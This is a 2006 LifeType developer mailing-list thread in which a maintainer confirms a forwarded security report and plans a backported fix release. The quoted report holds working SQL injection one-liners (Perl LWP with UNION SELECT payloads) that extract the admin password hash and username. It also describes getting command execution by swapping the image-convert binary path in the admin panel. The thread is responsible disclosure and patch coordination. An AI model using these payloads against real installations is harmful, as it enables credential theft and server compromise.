[pLog-svn] Fwd: Security problem

Mon Jul 3 16:23:15 GMT 2006

Ye, I think I can confirm this.

I rememver I fixed this bug 1.1 sometime ago.... But I don't know some can
use it to inject sql ...

We need to backport the fix from 1.1 to 1.0, too.

That means we will have a 1.0.6 soon.

Mark 

> -----Original Message-----
> From: plog-svn-bounces at devel.lifetype.net 
> [mailto:plog-svn-bounces at devel.lifetype.net] On Behalf Of 
> Oscar Renalias
> Sent: Monday, July 03, 2006 11:58 PM
> To: plog-svn at devel.lifetype.net
> Subject: [pLog-svn] Fwd: Security problem
> 
> Can somebody quickly investigate this?
> 
> ---------- Forwarded message ----------
> From: A. Ramos <aramosf at unsec.net>
> Date: Jul 3, 2006 5:45 PM
> Subject: Security problem
> To: contact at lifetype.net
> 
> 
> Hello :-)
> 
> They are one sql injection in latest version of lifetype:
> 
> 
> To get md5 passwd:
> perl -MLWP::Simple -e "getprint
> 'http://localhost/index.php?op=Default&Date=200607\'%20UNION%2
> 0SELECT%201,password,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE
> %20id=\'1\'/*&blogId=1'"
> | perl -ne 'print "password: ".$1."\n" if /articleId=(\w*).*h3/'
> 
> To get admin username:
> perl -MLWP::Simple -e "getprint
> 'http://localhost/index.php?op=Default&Date=200607\'%20UNION%2
> 0SELECT%201,user,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20i
> d=\'1\'/*&blogId=1'"
> | perl -ne 'print "admin: ".$1."\n" if /articleId=(\w*).*h3/'
> 
> And if you can access to the admin control panel, you can run 
> commands in the system changing the value of /usr/bin/convert 
> and put your own command. Upload some picture and wait to 
> resize with the evil command.
> 
> I think they are more bugs but I havent time to check for more.
> 
> Thank you.
> 
> --
> 
> A. Ramos  <aka dab>
> mailto: <aramosf at unsec.net>
> http://www.unsec.net
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://devel.lifetype.net/mailman/listinfo/plog-svn